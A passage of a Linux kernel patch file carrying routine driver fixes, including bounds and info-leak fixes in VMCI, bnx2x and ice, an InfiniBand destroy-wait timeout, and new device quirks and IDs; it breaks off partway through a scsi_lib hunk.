+diff --git a/drivers/gpu/drm/amd/display/modules/inc/mod_stats.h b/drivers/gpu/drm/amd/display/modules/inc/mod_stats.h
+index 4220fd8fdd60c..54cd86060f4d6 100644
+--- a/drivers/gpu/drm/amd/display/modules/inc/mod_stats.h
++++ b/drivers/gpu/drm/amd/display/modules/inc/mod_stats.h
+@@ -57,10 +57,10 @@ void mod_stats_update_event(struct mod_stats *mod_stats,
+ 		unsigned int length);
+ 
+ void mod_stats_update_flip(struct mod_stats *mod_stats,
+-		unsigned long timestamp_in_ns);
++		unsigned long long timestamp_in_ns);
+ 
+ void mod_stats_update_vupdate(struct mod_stats *mod_stats,
+-		unsigned long timestamp_in_ns);
++		unsigned long long timestamp_in_ns);
+ 
+ void mod_stats_update_freesync(struct mod_stats *mod_stats,
+ 		unsigned int v_total_min,
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index d5c15292ae937..3fe5e6439c401 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -117,6 +117,12 @@ static const struct drm_dmi_panel_orientation_data lcd1080x1920_leftside_up = {
+ 	.orientation = DRM_MODE_PANEL_ORIENTATION_LEFT_UP,
+ };
+ 
++static const struct drm_dmi_panel_orientation_data lcd1080x1920_rightside_up = {
++	.width = 1080,
++	.height = 1920,
++	.orientation = DRM_MODE_PANEL_ORIENTATION_RIGHT_UP,
++};
++
+ static const struct drm_dmi_panel_orientation_data lcd1200x1920_rightside_up = {
+ 	.width = 1200,
+ 	.height = 1920,
+@@ -279,6 +285,12 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "G1618-03")
+ 		},
+ 		.driver_data = (void *)&lcd720x1280_rightside_up,
++	}, {	/* GPD Win Mini */
++		.matches = {
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "GPD"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "G1617-01")
++		},
++		.driver_data = (void *)&lcd1080x1920_rightside_up,
+ 	}, {	/* I.T.Works TW891 */
+ 		.matches = {
+ 		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "To be filled by O.E.M."),
+diff --git a/drivers/gpu/drm/vc4/vc4_plane.c b/drivers/gpu/drm/vc4/vc4_plane.c
+index eb08020154f30..7e6648b277b25 100644
+--- a/drivers/gpu/drm/vc4/vc4_plane.c
++++ b/drivers/gpu/drm/vc4/vc4_plane.c
+@@ -1415,9 +1415,6 @@ static int vc4_prepare_fb(struct drm_plane *plane,
+ 
+ 	drm_gem_plane_helper_prepare_fb(plane, state);
+ 
+-	if (plane->state->fb == state->fb)
+-		return 0;
+-
+ 	return vc4_bo_inc_usecnt(bo);
+ }
+ 
+@@ -1426,7 +1423,7 @@ static void vc4_cleanup_fb(struct drm_plane *plane,
+ {
+ 	struct vc4_bo *bo;
+ 
+-	if (plane->state->fb == state->fb || !state->fb)
++	if (!state->fb)
+ 		return;
+ 
+ 	bo = to_vc4_bo(&drm_fb_dma_get_gem_obj(state->fb, 0)->base);
+diff --git a/drivers/infiniband/core/cm.c b/drivers/infiniband/core/cm.c
+index b7f9023442890..462a10d6a5762 100644
+--- a/drivers/infiniband/core/cm.c
++++ b/drivers/infiniband/core/cm.c
+@@ -34,6 +34,7 @@ MODULE_AUTHOR("Sean Hefty");
+ MODULE_DESCRIPTION("InfiniBand CM");
+ MODULE_LICENSE("Dual BSD/GPL");
+ 
++#define CM_DESTROY_ID_WAIT_TIMEOUT 10000 /* msecs */
+ static const char * const ibcm_rej_reason_strs[] = {
+ 	[IB_CM_REJ_NO_QP]			= "no QP",
+ 	[IB_CM_REJ_NO_EEC]			= "no EEC",
+@@ -1025,10 +1026,20 @@ static void cm_reset_to_idle(struct cm_id_private *cm_id_priv)
+ 	}
+ }
+ 
++static noinline void cm_destroy_id_wait_timeout(struct ib_cm_id *cm_id)
++{
++	struct cm_id_private *cm_id_priv;
++
++	cm_id_priv = container_of(cm_id, struct cm_id_private, id);
++	pr_err("%s: cm_id=%p timed out. state=%d refcnt=%d\n", __func__,
++	       cm_id, cm_id->state, refcount_read(&cm_id_priv->refcount));
++}
++
+ static void cm_destroy_id(struct ib_cm_id *cm_id, int err)
+ {
+ 	struct cm_id_private *cm_id_priv;
+ 	struct cm_work *work;
++	int ret;
+ 
+ 	cm_id_priv = container_of(cm_id, struct cm_id_private, id);
+ 	spin_lock_irq(&cm_id_priv->lock);
+@@ -1135,7 +1146,14 @@ static void cm_destroy_id(struct ib_cm_id *cm_id, int err)
+ 
+ 	xa_erase(&cm.local_id_table, cm_local_id(cm_id->local_id));
+ 	cm_deref_id(cm_id_priv);
+-	wait_for_completion(&cm_id_priv->comp);
++	do {
++		ret = wait_for_completion_timeout(&cm_id_priv->comp,
++						  msecs_to_jiffies(
++						  CM_DESTROY_ID_WAIT_TIMEOUT));
++		if (!ret) /* timeout happened */
++			cm_destroy_id_wait_timeout(cm_id);
++	} while (!ret);
++
+ 	while ((work = cm_dequeue_work(cm_id_priv)) != NULL)
+ 		cm_free_work(work);
+ 
+diff --git a/drivers/input/rmi4/rmi_driver.c b/drivers/input/rmi4/rmi_driver.c
+index 258d5fe3d395c..aa32371f04af6 100644
+--- a/drivers/input/rmi4/rmi_driver.c
++++ b/drivers/input/rmi4/rmi_driver.c
+@@ -1196,7 +1196,11 @@ static int rmi_driver_probe(struct device *dev)
+ 		}
+ 		rmi_driver_set_input_params(rmi_dev, data->input);
+ 		data->input->phys = devm_kasprintf(dev, GFP_KERNEL,
+-						"%s/input0", dev_name(dev));
++						   "%s/input0", dev_name(dev));
++		if (!data->input->phys) {
++			retval = -ENOMEM;
++			goto err;
++		}
+ 	}
+ 
+ 	retval = rmi_init_functions(data);
+diff --git a/drivers/input/touchscreen/imagis.c b/drivers/input/touchscreen/imagis.c
+index e2697e6c6d2a0..2636e1c9435d8 100644
+--- a/drivers/input/touchscreen/imagis.c
++++ b/drivers/input/touchscreen/imagis.c
+@@ -1,5 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+ 
++#include <linux/bitfield.h>
+ #include <linux/bits.h>
+ #include <linux/delay.h>
+ #include <linux/i2c.h>
+@@ -23,12 +24,9 @@
+ #define IST3038C_I2C_RETRY_COUNT	3
+ #define IST3038C_MAX_FINGER_NUM		10
+ #define IST3038C_X_MASK			GENMASK(23, 12)
+-#define IST3038C_X_SHIFT		12
+ #define IST3038C_Y_MASK			GENMASK(11, 0)
+ #define IST3038C_AREA_MASK		GENMASK(27, 24)
+-#define IST3038C_AREA_SHIFT		24
+ #define IST3038C_FINGER_COUNT_MASK	GENMASK(15, 12)
+-#define IST3038C_FINGER_COUNT_SHIFT	12
+ #define IST3038C_FINGER_STATUS_MASK	GENMASK(9, 0)
+ 
+ struct imagis_ts {
+@@ -92,8 +90,7 @@ static irqreturn_t imagis_interrupt(int irq, void *dev_id)
+ 		goto out;
+ 	}
+ 
+-	finger_count = (intr_message & IST3038C_FINGER_COUNT_MASK) >>
+-				IST3038C_FINGER_COUNT_SHIFT;
++	finger_count = FIELD_GET(IST3038C_FINGER_COUNT_MASK, intr_message);
+ 	if (finger_count > IST3038C_MAX_FINGER_NUM) {
+ 		dev_err(&ts->client->dev,
+ 			"finger count %d is more than maximum supported\n",
+@@ -101,7 +98,7 @@ static irqreturn_t imagis_interrupt(int irq, void *dev_id)
+ 		goto out;
+ 	}
+ 
+-	finger_pressed = intr_message & IST3038C_FINGER_STATUS_MASK;
++	finger_pressed = FIELD_GET(IST3038C_FINGER_STATUS_MASK, intr_message);
+ 
+ 	for (i = 0; i < finger_count; i++) {
+ 		error = imagis_i2c_read_reg(ts,
+@@ -118,12 +115,11 @@ static irqreturn_t imagis_interrupt(int irq, void *dev_id)
+ 		input_mt_report_slot_state(ts->input_dev, MT_TOOL_FINGER,
+ 					   finger_pressed & BIT(i));
+ 		touchscreen_report_pos(ts->input_dev, &ts->prop,
+-				       (finger_status & IST3038C_X_MASK) >>
+-						IST3038C_X_SHIFT,
+-				       finger_status & IST3038C_Y_MASK, 1);
++				       FIELD_GET(IST3038C_X_MASK, finger_status),
++				       FIELD_GET(IST3038C_Y_MASK, finger_status),
++				       true);
+ 		input_report_abs(ts->input_dev, ABS_MT_TOUCH_MAJOR,
+-				 (finger_status & IST3038C_AREA_MASK) >>
+-					IST3038C_AREA_SHIFT);
++				 FIELD_GET(IST3038C_AREA_MASK, finger_status));
+ 	}
+ 
+ 	input_mt_sync_frame(ts->input_dev);
+@@ -210,7 +206,7 @@ static int imagis_init_input_dev(struct imagis_ts *ts)
+ 
+ 	input_set_capability(input_dev, EV_ABS, ABS_MT_POSITION_X);
+ 	input_set_capability(input_dev, EV_ABS, ABS_MT_POSITION_Y);
+-	input_set_abs_params(input_dev, ABS_MT_TOUCH_MAJOR, 0, 255, 0, 0);
++	input_set_abs_params(input_dev, ABS_MT_TOUCH_MAJOR, 0, 16, 0, 0);
+ 
+ 	touchscreen_parse_properties(input_dev, true, &ts->prop);
+ 	if (!ts->prop.max_x || !ts->prop.max_y) {
+diff --git a/drivers/media/pci/sta2x11/sta2x11_vip.c b/drivers/media/pci/sta2x11/sta2x11_vip.c
+index 8535e49a4c4f9..1f7ab56de4a00 100644
+--- a/drivers/media/pci/sta2x11/sta2x11_vip.c
++++ b/drivers/media/pci/sta2x11/sta2x11_vip.c
+@@ -756,7 +756,7 @@ static const struct video_device video_dev_template = {
+ /**
+  * vip_irq - interrupt routine
+  * @irq: Number of interrupt ( not used, correct number is assumed )
+- * @vip: local data structure containing all information
++ * @data: local data structure containing all information
+  *
+  * check for both frame interrupts set ( top and bottom ).
+  * check FIFO overflow, but limit number of log messages after open.
+@@ -766,8 +766,9 @@ static const struct video_device video_dev_template = {
+  *
+  * IRQ_HANDLED, interrupt done.
+  */
+-static irqreturn_t vip_irq(int irq, struct sta2x11_vip *vip)
++static irqreturn_t vip_irq(int irq, void *data)
+ {
++	struct sta2x11_vip *vip = data;
+ 	unsigned int status;
+ 
+ 	status = reg_read(vip, DVP_ITS);
+@@ -1049,9 +1050,7 @@ static int sta2x11_vip_init_one(struct pci_dev *pdev,
+ 
+ 	spin_lock_init(&vip->slock);
+ 
+-	ret = request_irq(pdev->irq,
+-			  (irq_handler_t) vip_irq,
+-			  IRQF_SHARED, KBUILD_MODNAME, vip);
++	ret = request_irq(pdev->irq, vip_irq, IRQF_SHARED, KBUILD_MODNAME, vip);
+ 	if (ret) {
+ 		dev_err(&pdev->dev, "request_irq failed\n");
+ 		ret = -ENODEV;
+diff --git a/drivers/misc/vmw_vmci/vmci_datagram.c b/drivers/misc/vmw_vmci/vmci_datagram.c
+index f50d22882476f..a0ad1f3a69f7e 100644
+--- a/drivers/misc/vmw_vmci/vmci_datagram.c
++++ b/drivers/misc/vmw_vmci/vmci_datagram.c
+@@ -234,7 +234,8 @@ static int dg_dispatch_as_host(u32 context_id, struct vmci_datagram *dg)
+ 
+ 			dg_info->in_dg_host_queue = true;
+ 			dg_info->entry = dst_entry;
+-			memcpy(&dg_info->msg, dg, dg_size);
++			dg_info->msg = *dg;
++			memcpy(&dg_info->msg_payload, dg + 1, dg->payload_size);
+ 
+ 			INIT_WORK(&dg_info->work, dg_delayed_dispatch);
+ 			schedule_work(&dg_info->work);
+@@ -377,7 +378,8 @@ int vmci_datagram_invoke_guest_handler(struct vmci_datagram *dg)
+ 
+ 		dg_info->in_dg_host_queue = false;
+ 		dg_info->entry = dst_entry;
+-		memcpy(&dg_info->msg, dg, VMCI_DG_SIZE(dg));
++		dg_info->msg = *dg;
++		memcpy(&dg_info->msg_payload, dg + 1, dg->payload_size);
+ 
+ 		INIT_WORK(&dg_info->work, dg_delayed_dispatch);
+ 		schedule_work(&dg_info->work);
+diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
+index 4950fde82d175..b04c5b51eb598 100644
+--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
++++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
+@@ -147,10 +147,11 @@ void bnx2x_fill_fw_str(struct bnx2x *bp, char *buf, size_t buf_len)
+ 
+ 		phy_fw_ver[0] = '\0';
+ 		bnx2x_get_ext_phy_fw_version(&bp->link_params,
+-					     phy_fw_ver, PHY_FW_VER_LEN);
+-		strscpy(buf, bp->fw_ver, buf_len);
+-		snprintf(buf + strlen(bp->fw_ver), 32 - strlen(bp->fw_ver),
+-			 "bc %d.%d.%d%s%s",
++					     phy_fw_ver, sizeof(phy_fw_ver));
++		/* This may become truncated. */
++		scnprintf(buf, buf_len,
++			 "%sbc %d.%d.%d%s%s",
++			 bp->fw_ver,
+ 			 (bp->common.bc_ver & 0xff0000) >> 16,
+ 			 (bp->common.bc_ver & 0xff00) >> 8,
+ 			 (bp->common.bc_ver & 0xff),
+diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c
+index bda3ccc28eca6..f920976c36f0c 100644
+--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c
++++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c
+@@ -1132,7 +1132,7 @@ static void bnx2x_get_drvinfo(struct net_device *dev,
+ 	}
+ 
+ 	memset(version, 0, sizeof(version));
+-	bnx2x_fill_fw_str(bp, version, ETHTOOL_FWVERS_LEN);
++	bnx2x_fill_fw_str(bp, version, sizeof(version));
+ 	strlcat(info->fw_version, version, sizeof(info->fw_version));
+ 
+ 	strscpy(info->bus_info, pci_name(bp->pdev), sizeof(info->bus_info));
+diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_link.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_link.c
+index 02808513ffe45..ea310057fe3af 100644
+--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_link.c
++++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_link.c
+@@ -6163,8 +6163,8 @@ static void bnx2x_link_int_ack(struct link_params *params,
+ 
+ static int bnx2x_null_format_ver(u32 spirom_ver, u8 *str, u16 *len)
+ {
+-	str[0] = '\0';
+-	(*len)--;
++	if (*len)
++		str[0] = '\0';
+ 	return 0;
+ }
+ 
+@@ -6173,7 +6173,7 @@ static int bnx2x_format_ver(u32 num, u8 *str, u16 *len)
+ 	u16 ret;
+ 
+ 	if (*len < 10) {
+-		/* Need more than 10chars for this format */
++		/* Need more than 10 chars for this format */
+ 		bnx2x_null_format_ver(num, str, len);
+ 		return -EINVAL;
+ 	}
+@@ -6188,8 +6188,8 @@ static int bnx2x_3_seq_format_ver(u32 num, u8 *str, u16 *len)
+ {
+ 	u16 ret;
+ 
+-	if (*len < 10) {
+-		/* Need more than 10chars for this format */
++	if (*len < 9) {
++		/* Need more than 9 chars for this format */
+ 		bnx2x_null_format_ver(num, str, len);
+ 		return -EINVAL;
+ 	}
+@@ -6208,7 +6208,7 @@ int bnx2x_get_ext_phy_fw_version(struct link_params *params, u8 *version,
+ 	int status = 0;
+ 	u8 *ver_p = version;
+ 	u16 remain_len = len;
+-	if (version == NULL || params == NULL)
++	if (version == NULL || params == NULL || len == 0)
+ 		return -EINVAL;
+ 	bp = params->bp;
+ 
+@@ -11546,7 +11546,7 @@ static int bnx2x_7101_format_ver(u32 spirom_ver, u8 *str, u16 *len)
+ 	str[2] = (spirom_ver & 0xFF0000) >> 16;
+ 	str[3] = (spirom_ver & 0xFF000000) >> 24;
+ 	str[4] = '\0';
+-	*len -= 5;
++	*len -= 4;
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl.c b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+index 4b71392f60df1..e64bef490a174 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+@@ -493,7 +493,7 @@ static int ice_vc_get_vf_res_msg(struct ice_vf *vf, u8 *msg)
+ 	vfres->rss_lut_size = ICE_VSIQF_HLUT_ARRAY_SIZE;
+ 	vfres->max_mtu = ice_vc_get_max_frame_size(vf);
+ 
+-	vfres->vsi_res[0].vsi_id = vf->lan_vsi_num;
++	vfres->vsi_res[0].vsi_id = ICE_VF_VSI_ID;
+ 	vfres->vsi_res[0].vsi_type = VIRTCHNL_VSI_SRIOV;
+ 	vfres->vsi_res[0].num_queue_pairs = vsi->num_txq;
+ 	ether_addr_copy(vfres->vsi_res[0].default_mac_addr,
+@@ -539,12 +539,7 @@ static void ice_vc_reset_vf_msg(struct ice_vf *vf)
+  */
+ bool ice_vc_isvalid_vsi_id(struct ice_vf *vf, u16 vsi_id)
+ {
+-	struct ice_pf *pf = vf->pf;
+-	struct ice_vsi *vsi;
+-
+-	vsi = ice_find_vsi(pf, vsi_id);
+-
+-	return (vsi && (vsi->vf == vf));
++	return vsi_id == ICE_VF_VSI_ID;
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl.h b/drivers/net/ethernet/intel/ice/ice_virtchnl.h
+index b5a3fd8adbb4e..6073d3b2d2d65 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl.h
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl.h
+@@ -18,6 +18,15 @@
+  */
+ #define ICE_MAX_MACADDR_PER_VF		18
+ 
++/* VFs only get a single VSI. For ice hardware, the VF does not need to know
++ * its VSI index. However, the virtchnl interface requires a VSI number,
++ * mainly due to legacy hardware.
++ *
++ * Since the VF doesn't need this information, report a static value to the VF
++ * instead of leaking any information about the PF or hardware setup.
++ */
++#define ICE_VF_VSI_ID	1
++
+ struct ice_virtchnl_ops {
+ 	int (*get_ver_msg)(struct ice_vf *vf, u8 *msg);
+ 	int (*get_vf_res_msg)(struct ice_vf *vf, u8 *msg);
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_lif.c b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+index fcc3faecb0600..d33cf8ee7c336 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_lif.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+@@ -3216,9 +3216,12 @@ static int ionic_lif_adminq_init(struct ionic_lif *lif)
+ 
+ 	napi_enable(&qcq->napi);
+ 
+-	if (qcq->flags & IONIC_QCQ_F_INTR)
++	if (qcq->flags & IONIC_QCQ_F_INTR) {
++		irq_set_affinity_hint(qcq->intr.vector,
++				      &qcq->intr.affinity_mask);
+ 		ionic_intr_mask(idev->intr_ctrl, qcq->intr.index,
+ 				IONIC_INTR_MASK_CLEAR);
++	}
+ 
+ 	qcq->flags |= IONIC_QCQ_F_INITED;
+ 
+diff --git a/drivers/net/pcs/pcs-xpcs.c b/drivers/net/pcs/pcs-xpcs.c
+index 3f882bce37f42..d126273daab4f 100644
+--- a/drivers/net/pcs/pcs-xpcs.c
++++ b/drivers/net/pcs/pcs-xpcs.c
+@@ -262,7 +262,7 @@ static int xpcs_soft_reset(struct dw_xpcs *xpcs,
+ 		dev = MDIO_MMD_VEND2;
+ 		break;
+ 	default:
+-		return -1;
++		return -EINVAL;
+ 	}
+ 
+ 	ret = xpcs_write(xpcs, dev, MDIO_CTRL1, MDIO_CTRL1_RESET);
+@@ -904,7 +904,7 @@ int xpcs_do_config(struct dw_xpcs *xpcs, phy_interface_t interface,
+ 			return ret;
+ 		break;
+ 	default:
+-		return -1;
++		return -EINVAL;
+ 	}
+ 
+ 	if (compat->pma_config) {
+diff --git a/drivers/net/wireless/ath/ath11k/mhi.c b/drivers/net/wireless/ath/ath11k/mhi.c
+index a62ee05c54097..4bea36cc71085 100644
+--- a/drivers/net/wireless/ath/ath11k/mhi.c
++++ b/drivers/net/wireless/ath/ath11k/mhi.c
+@@ -105,7 +105,7 @@ static struct mhi_controller_config ath11k_mhi_config_qca6390 = {
+ 	.max_channels = 128,
+ 	.timeout_ms = 2000,
+ 	.use_bounce_buf = false,
+-	.buf_len = 0,
++	.buf_len = 8192,
+ 	.num_channels = ARRAY_SIZE(ath11k_mhi_channels_qca6390),
+ 	.ch_cfg = ath11k_mhi_channels_qca6390,
+ 	.num_events = ARRAY_SIZE(ath11k_mhi_events_qca6390),
+diff --git a/drivers/net/wireless/ath/ath9k/antenna.c b/drivers/net/wireless/ath/ath9k/antenna.c
+index 988222cea9dfe..acc84e6711b0e 100644
+--- a/drivers/net/wireless/ath/ath9k/antenna.c
++++ b/drivers/net/wireless/ath/ath9k/antenna.c
+@@ -643,7 +643,7 @@ static void ath_ant_try_scan(struct ath_ant_comb *antcomb,
+ 				conf->main_lna_conf = ATH_ANT_DIV_COMB_LNA1;
+ 				conf->alt_lna_conf = ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2;
+ 			} else if (antcomb->rssi_sub >
+-				   antcomb->rssi_lna1) {
++				   antcomb->rssi_lna2) {
+ 				/* set to A-B */
+ 				conf->main_lna_conf = ATH_ANT_DIV_COMB_LNA1;
+ 				conf->alt_lna_conf = ATH_ANT_DIV_COMB_LNA1_MINUS_LNA2;
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/dmi.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/dmi.c
+index 86ff174936a9a..c3a602197662b 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/dmi.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/dmi.c
+@@ -82,6 +82,15 @@ static const struct dmi_system_id dmi_platform_data[] = {
+ 		},
+ 		.driver_data = (void *)&acepc_t8_data,
+ 	},
++	{
++		/* ACEPC W5 Pro Cherry Trail Z8350 HDMI stick, same wifi as the T8 */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "T3 MRD"),
++			DMI_MATCH(DMI_CHASSIS_TYPE, "3"),
++			DMI_MATCH(DMI_BIOS_VENDOR, "American Megatrends Inc."),
++		},
++		.driver_data = (void *)&acepc_t8_data,
++	},
+ 	{
+ 		/* Chuwi Hi8 Pro with D2D3_Hi8Pro.233 BIOS */
+ 		.matches = {
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+index 4d4db5f6836be..7f30e6add9933 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+@@ -505,6 +505,7 @@ static const struct pci_device_id iwl_hw_card_ids[] = {
+ 
+ /* Bz devices */
+ 	{IWL_PCI_DEVICE(0x2727, PCI_ANY_ID, iwl_bz_trans_cfg)},
++	{IWL_PCI_DEVICE(0x272D, PCI_ANY_ID, iwl_bz_trans_cfg)},
+ 	{IWL_PCI_DEVICE(0x272b, PCI_ANY_ID, iwl_bz_trans_cfg)},
+ 	{IWL_PCI_DEVICE(0xA840, PCI_ANY_ID, iwl_bz_trans_cfg)},
+ 	{IWL_PCI_DEVICE(0x7740, PCI_ANY_ID, iwl_bz_trans_cfg)},
+diff --git a/drivers/net/wireless/realtek/rtw89/pci.h b/drivers/net/wireless/realtek/rtw89/pci.h
+index 179740607778a..d982c5dc0889f 100644
+--- a/drivers/net/wireless/realtek/rtw89/pci.h
++++ b/drivers/net/wireless/realtek/rtw89/pci.h
+@@ -546,7 +546,7 @@
+ #define RTW89_PCI_TXWD_NUM_MAX		512
+ #define RTW89_PCI_TXWD_PAGE_SIZE	128
+ #define RTW89_PCI_ADDRINFO_MAX		4
+-#define RTW89_PCI_RX_BUF_SIZE		11460
++#define RTW89_PCI_RX_BUF_SIZE		(11454 + 40) /* +40 for rtw89_rxdesc_long_v2 */
+ 
+ #define RTW89_PCI_POLL_BDRAM_RST_CNT	100
+ #define RTW89_PCI_MULTITAG		8
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 3d01290994d89..5ff09f2cacab7 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3471,6 +3471,9 @@ static const struct pci_device_id nvme_id_table[] = {
+ 				NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_VDEVICE(REDHAT, 0x0010),	/* Qemu emulated controller */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
++	{ PCI_DEVICE(0x126f, 0x2262),	/* Silicon Motion generic */
++		.driver_data = NVME_QUIRK_NO_DEEPEST_PS |
++				NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x126f, 0x2263),	/* Silicon Motion unidentified */
+ 		.driver_data = NVME_QUIRK_NO_NS_DESC_LIST |
+ 				NVME_QUIRK_BOGUS_NID, },
+diff --git a/drivers/pinctrl/renesas/core.c b/drivers/pinctrl/renesas/core.c
+index c91102d3f1d15..1c7f8caf7f7cd 100644
+--- a/drivers/pinctrl/renesas/core.c
++++ b/drivers/pinctrl/renesas/core.c
+@@ -921,9 +921,11 @@ static void __init sh_pfc_check_cfg_reg(const char *drvname,
+ 		sh_pfc_err("reg 0x%x: var_field_width declares %u instead of %u bits\n",
+ 			   cfg_reg->reg, rw, cfg_reg->reg_width);
+ 
+-	if (n != cfg_reg->nr_enum_ids)
++	if (n != cfg_reg->nr_enum_ids) {
+ 		sh_pfc_err("reg 0x%x: enum_ids[] has %u instead of %u values\n",
+ 			   cfg_reg->reg, cfg_reg->nr_enum_ids, n);
++		n = cfg_reg->nr_enum_ids;
++	}
+ 
+ check_enum_ids:
+ 	sh_pfc_check_reg_enums(drvname, cfg_reg->reg, cfg_reg->enum_ids, n);
+diff --git a/drivers/platform/x86/intel/vbtn.c b/drivers/platform/x86/intel/vbtn.c
+index c10c99a31a90a..224139006a433 100644
+--- a/drivers/platform/x86/intel/vbtn.c
++++ b/drivers/platform/x86/intel/vbtn.c
+@@ -136,8 +136,6 @@ static int intel_vbtn_input_setup(struct platform_device *device)
+ 	priv->switches_dev->id.bustype = BUS_HOST;
+ 
+ 	if (priv->has_switches) {
+-		detect_tablet_mode(&device->dev);
+-
+ 		ret = input_register_device(priv->switches_dev);
+ 		if (ret)
+ 			return ret;
+@@ -316,6 +314,9 @@ static int intel_vbtn_probe(struct platform_device *device)
+ 		if (ACPI_FAILURE(status))
+ 			dev_err(&device->dev, "Error VBDL failed with ACPI status %d\n", status);
+ 	}
++	// Check switches after buttons since VBDL may have side effects.
++	if (has_switches)
++		detect_tablet_mode(&device->dev);
+ 
+ 	device_init_wakeup(&device->dev, true);
+ 	/*
+diff --git a/drivers/platform/x86/touchscreen_dmi.c b/drivers/platform/x86/touchscreen_dmi.c
+index 11d72a3533552..399b97b54dd0f 100644
+--- a/drivers/platform/x86/touchscreen_dmi.c
++++ b/drivers/platform/x86/touchscreen_dmi.c
+@@ -1177,6 +1177,15 @@ const struct dmi_system_id touchscreen_dmi_table[] = {
+ 			DMI_MATCH(DMI_BIOS_VERSION, "CHUWI.D86JLBNR"),
+ 		},
+ 	},
++	{
++		/* Chuwi Vi8 dual-boot (CWI506) */
++		.driver_data = (void *)&chuwi_vi8_data,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Insyde"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "i86"),
++			DMI_MATCH(DMI_BIOS_VERSION, "CHUWI2.D86JHBNR02"),
++		},
++	},
+ 	{
+ 		/* Chuwi Vi8 Plus (CWI519) */
+ 		.driver_data = (void *)&chuwi_vi8_plus_data,
+diff --git a/drivers/scsi/lpfc/lpfc_nportdisc.c b/drivers/scsi/lpfc/lpfc_nportdisc.c
+index b86ff9fcdf0c6..f21396a0ba9d0 100644
+--- a/drivers/scsi/lpfc/lpfc_nportdisc.c
++++ b/drivers/scsi/lpfc/lpfc_nportdisc.c
+@@ -748,8 +748,10 @@ lpfc_rcv_padisc(struct lpfc_vport *vport, struct lpfc_nodelist *ndlp,
+ 				/* Save the ELS cmd */
+ 				elsiocb->drvrTimeout = cmd;
+ 
+-				lpfc_sli4_resume_rpi(ndlp,
+-					lpfc_mbx_cmpl_resume_rpi, elsiocb);
++				if (lpfc_sli4_resume_rpi(ndlp,
++						lpfc_mbx_cmpl_resume_rpi,
++						elsiocb))
++					kfree(elsiocb);
+ 				goto out;
+ 			}
+ 		}
+diff --git a/drivers/scsi/scsi_lib.c b/drivers/scsi/scsi_lib.c
+index edd296f950a33..5c5954b78585e 100644
+--- a/drivers/scsi/scsi_lib.c
++++ b/drivers/scsi/scsi_lib.c
+@@ -185,37 +185,39 @@ void scsi_queue_insert(struct scsi_cmnd *cmd, int reason)
+ 	__scsi_queue_insert(cmd, reason, true);
+ }
+ 
++
+ /**
+- * scsi_execute_cmd - insert request and wait for the result
+- * @sdev:	scsi_device
++ * __scsi_execute - insert request and wait for the result
++ * @sdev:	scsi device
+  * @cmd:	scsi command
+- * @opf:	block layer request cmd_flags
++ * @data_direction: data direction
+  * @buffer:	data buffer
+  * @bufflen:	len of buffer
++ * @sense:	optional sense buffer
++ * @sshdr:	optional decoded sense header
+  * @timeout:	request timeout in HZ
+  * @retries:	number of times to retry request
+- * @args:	Optional args. See struct definition for field descriptions
++ * @flags:	flags for ->cmd_flags
++ * @rq_flags:	flags for ->rq_flags
++ * @resid:	optional residual length
+  *
+  * Returns the scsi_cmnd result field if a command was executed, or a negative
+  * Linux error code if we didn't get that far.
+  */
+-int scsi_execute_cmd(struct scsi_device *sdev, const unsigned char *cmd,
+-		     blk_opf_t opf, void *buffer, unsigned int bufflen,
+-		     int timeout, int retries,
+-		     const struct scsi_exec_args *args)
